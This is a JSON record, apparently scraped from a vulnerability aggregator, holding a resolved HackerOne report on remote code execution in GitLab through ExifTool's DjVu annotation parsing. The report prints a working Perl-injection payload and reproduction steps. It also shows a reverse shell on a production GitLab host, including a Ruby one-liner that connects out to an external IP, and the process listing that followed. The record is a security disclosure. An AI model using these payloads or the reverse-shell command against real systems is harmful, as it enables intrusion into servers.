"1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQRUONMTMT%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T202945Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIT%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJHMEUCIHwwTFN%2BwrdYB%2BV9HvTUoC5S660phSubkzIb9SqcjMAlAiEAhwBaHxR74Vknv%2BhHQEMHbkMn8tFtmnHSmNSPHK5zajsq%2BgMIHRACGgwwMTM2MTkyNzQ4NDkiDFcTXL%2F0lz0GAvIDPyrXAxcDpqs4x3%2F1hwsryXDfk5Is9irx5XfIBg4db7n4xq2WkOTBNIXPg5e08HBXwh2bDxbKlUUvNgowsXA%2BqoF60u6xLqHjdh3o2N9j9AItkK9lXo%2B0fmdEL%2BCwoc3%2FNqr7vhHZmXO0eKBbF8li7cL1aSqiO0Suz5dwsMM8k88vxO4O18Al%2FL7PBbAGZO50fJn2FG67EO7fTG1wbZp0%2F%2BYwy%2F0U%2BOP6s4TMBxckh6ue7QyYgTDualeXGH7A4ujRcX%2Bzi96QCBmlsQDNVktwHktcl%2FWHoY1lHGyrxVKzipt8tX4X2CNKCYoQ2mNeeJRlXOxicjPOEjNjAyB0WihGjtPrsfmU6K%2BOLPrT53VdE0W9RBUaXzR55Z6WqJMxpfUnkWbAkwMm9MHPFHB5iV3grSNlYY9rIzKEjOyMh6vTalxKAIT%2BAIJ3t%2F0ahLJ82opdvNG%2BXTvzwHCDs1F%2BI8vNoAvZQl5hesHoISigWmh0dBIY2%2FdXzDaFFCNTwa9RRNRmIJdtlLsOE5T7bjNkVO%2FxOXWaM2MpDw4QPejoO78RB9JmFOMmFmMj1Zl4xmIe%2FIWf5R4SGm6X7kbdqKIEXsj4NQe6mxIDouiOoX5xAqBASnov22O7kPdrqpvcGTD1v4CFBjqlAVSD5OHXoYoFjLiqJcgvT0m2DCuzQjoZQpoXlUuG1VJ6v2rSYnXLMbkJxak0ZeAz5kpG8ejSO3gAzYBFDHvubMW5XSJxYXPJ4KkhrnmDqlhoybyvF9zWp43mWhqNeYeenlfidfw34zB04xUjmfDTH5fs31wsJCHfb5ishkPRXi%2Fqzs9878%2FjgbcZO8iBUc64bJQz%2BB2ifBb9%2B%2F5MTRBZwffmcfsBbw%3D%3D&X-Amz-Signature=dfc7b854265320283920f8b88dc79119a82c1a55743d8f7dd1efc2a4884c66b5"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T20:29:46", "differentElements": ["h1reporter"], "edition": 25}, {"bulletin": {"id": "H1:1154542", "hash": "d76ff1f7cb467916da24c6946e85c266", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 